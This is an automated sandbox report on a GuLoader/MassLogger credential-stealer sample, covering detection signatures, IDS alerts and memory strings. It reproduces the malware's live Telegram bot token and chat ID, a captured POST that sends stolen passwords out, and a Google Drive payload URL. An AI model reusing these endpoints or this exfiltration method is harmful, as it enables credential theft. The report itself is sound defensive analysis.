Edit tour

Windows Analysis Report
grrezORe7h.exe

Overview

General Information

Sample name:	grrezORe7h.exe renamed because original name is a hash value
Original sample name:	ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f.exe
Analysis ID:	1588933
MD5:	fd7d65a4a49c3867970510443c8819d5
SHA1:	088fa33f1e46a544ddec2d2493895abbf358b1d3
SHA256:	ad084a1c285369520a48712abaef5ebb566572f32e345d7e2356ada3fea0473f
Tags:	exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

grrezORe7h.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\grrezORe7h.exe" MD5: FD7D65A4A49C3867970510443C8819D5)

grrezORe7h.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\grrezORe7h.exe" MD5: FD7D65A4A49C3867970510443C8819D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Leawill27\Phonobsning.Nub	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000002.2989457326.00000000016C0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.2135234912.0000000002A10000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.2135234912.00000000035B7000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: grrezORe7h.exe PID: 7776	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: grrezORe7h.exe PID: 7776	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: grrezORe7h.exe PID: 7776	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 4 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:24:08.519741+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49810	149.154.167.220	443	TCP
2025-01-11T07:24:10.283485+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49822	149.154.167.220	443	TCP
2025-01-11T07:24:11.951960+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49832	149.154.167.220	443	TCP
2025-01-11T07:24:13.496886+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49844	149.154.167.220	443	TCP
2025-01-11T07:24:14.970989+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49856	149.154.167.220	443	TCP
2025-01-11T07:24:16.640414+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49868	149.154.167.220	443	TCP
2025-01-11T07:24:18.318060+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49883	149.154.167.220	443	TCP
2025-01-11T07:24:19.910084+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49895	149.154.167.220	443	TCP
2025-01-11T07:24:21.383818+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49904	149.154.167.220	443	TCP
2025-01-11T07:24:22.944003+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49917	149.154.167.220	443	TCP
2025-01-11T07:24:24.576918+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49933	149.154.167.220	443	TCP
2025-01-11T07:24:26.128064+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49945	149.154.167.220	443	TCP
2025-01-11T07:24:27.614794+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49957	149.154.167.220	443	TCP
2025-01-11T07:24:29.303334+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49969	149.154.167.220	443	TCP
2025-01-11T07:24:30.788758+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49981	149.154.167.220	443	TCP
2025-01-11T07:24:32.449590+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	49993	149.154.167.220	443	TCP
2025-01-11T07:24:34.070876+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50005	149.154.167.220	443	TCP
2025-01-11T07:24:35.664434+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50017	149.154.167.220	443	TCP
2025-01-11T07:24:37.245878+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50029	149.154.167.220	443	TCP
2025-01-11T07:24:38.795552+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50041	149.154.167.220	443	TCP
2025-01-11T07:24:40.334295+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50046	149.154.167.220	443	TCP
2025-01-11T07:24:41.908821+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50048	149.154.167.220	443	TCP
2025-01-11T07:24:43.473412+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50050	149.154.167.220	443	TCP
2025-01-11T07:24:45.068943+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50052	149.154.167.220	443	TCP
2025-01-11T07:24:47.160287+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50054	149.154.167.220	443	TCP
2025-01-11T07:24:49.080965+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50056	149.154.167.220	443	TCP
2025-01-11T07:24:50.562922+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50058	149.154.167.220	443	TCP
2025-01-11T07:24:52.212753+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50060	149.154.167.220	443	TCP
2025-01-11T07:24:54.266130+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50062	149.154.167.220	443	TCP
2025-01-11T07:24:56.121056+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50064	149.154.167.220	443	TCP
2025-01-11T07:24:58.424476+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50066	149.154.167.220	443	TCP
2025-01-11T07:24:59.947306+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50068	149.154.167.220	443	TCP
2025-01-11T07:25:02.686939+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50070	149.154.167.220	443	TCP
2025-01-11T07:25:13.005997+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.4	50072	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:24:00.060011+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49754	193.122.6.168	80	TCP
2025-01-11T07:24:07.638244+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49754	193.122.6.168	80	TCP
2025-01-11T07:24:09.388272+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49816	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:23:54.925350+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49736	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T07:24:08.255544+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49810	149.154.167.220	443	TCP
2025-01-11T07:24:09.963106+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49822	149.154.167.220	443	TCP
2025-01-11T07:24:11.564905+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49832	149.154.167.220	443	TCP
2025-01-11T07:24:13.221140+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49844	149.154.167.220	443	TCP
2025-01-11T07:24:14.745401+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49856	149.154.167.220	443	TCP
2025-01-11T07:24:16.253793+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49868	149.154.167.220	443	TCP
2025-01-11T07:24:18.016898+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49883	149.154.167.220	443	TCP
2025-01-11T07:24:19.603749+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49895	149.154.167.220	443	TCP
2025-01-11T07:24:21.153204+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49904	149.154.167.220	443	TCP
2025-01-11T07:24:22.653324+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49917	149.154.167.220	443	TCP
2025-01-11T07:24:24.220534+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49933	149.154.167.220	443	TCP
2025-01-11T07:24:25.863209+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49945	149.154.167.220	443	TCP
2025-01-11T07:24:27.392861+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49957	149.154.167.220	443	TCP
2025-01-11T07:24:28.888480+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49969	149.154.167.220	443	TCP
2025-01-11T07:24:30.572353+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49981	149.154.167.220	443	TCP
2025-01-11T07:24:32.063146+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	49993	149.154.167.220	443	TCP
2025-01-11T07:24:33.724104+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50005	149.154.167.220	443	TCP
2025-01-11T07:24:35.369425+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50017	149.154.167.220	443	TCP
2025-01-11T07:24:36.929721+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50029	149.154.167.220	443	TCP
2025-01-11T07:24:38.524909+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50041	149.154.167.220	443	TCP
2025-01-11T07:24:40.082855+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50046	149.154.167.220	443	TCP
2025-01-11T07:24:41.601157+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50048	149.154.167.220	443	TCP
2025-01-11T07:24:43.185350+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50050	149.154.167.220	443	TCP
2025-01-11T07:24:44.788587+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50052	149.154.167.220	443	TCP
2025-01-11T07:24:46.849422+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50054	149.154.167.220	443	TCP
2025-01-11T07:24:48.787594+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50056	149.154.167.220	443	TCP
2025-01-11T07:24:50.349263+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50058	149.154.167.220	443	TCP
2025-01-11T07:24:51.822317+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50060	149.154.167.220	443	TCP
2025-01-11T07:24:53.875530+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50062	149.154.167.220	443	TCP
2025-01-11T07:24:55.615119+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50064	149.154.167.220	443	TCP
2025-01-11T07:24:58.138782+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50066	149.154.167.220	443	TCP
2025-01-11T07:24:59.729945+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50068	149.154.167.220	443	TCP
2025-01-11T07:25:02.358363+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50070	149.154.167.220	443	TCP
2025-01-11T07:25:12.622587+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50072	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31dea4934fa5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndn
Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/.d
Source: grrezORe7h.exe, 00000004.00000003.2880307100.0000000036E5E000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3014530258.0000000036E37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/S
Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgH
Source: grrezORe7h.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034561000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: grrezORe7h.exe, 00000004.00000002.3012744348.000000003476C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003495C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.0000000034627000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000346FD000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003472D000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.000000003463C000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000347B6000.00000004.00000800.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000348D3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
Source: grrezORe7h.exe, 00000004.00000002.3012744348.00000000345BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgFrH
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: grrezORe7h.exe, 00000004.00000002.2991916769.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2992228193.0000000005A50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo
Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/P
Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Y40h
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp, grrezORe7h.exe, 00000004.00000002.2991916769.0000000003FAD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=download
Source: grrezORe7h.exe, 00000004.00000003.2270597506.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1t40TkIMwnRUYXXqQGD85PlamUR-D2DEo&export=downloadle
Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: grrezORe7h.exe, 00000004.00000002.3012744348.0000000034591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189.SH
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: grrezORe7h.exe, 00000004.00000003.2238578202.0000000003FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50017
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 50017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50072
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 142.250.181.238:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49810 version: TLS 1.2

Source: C:\Users\user\Desktop\grrezORe7h.exe

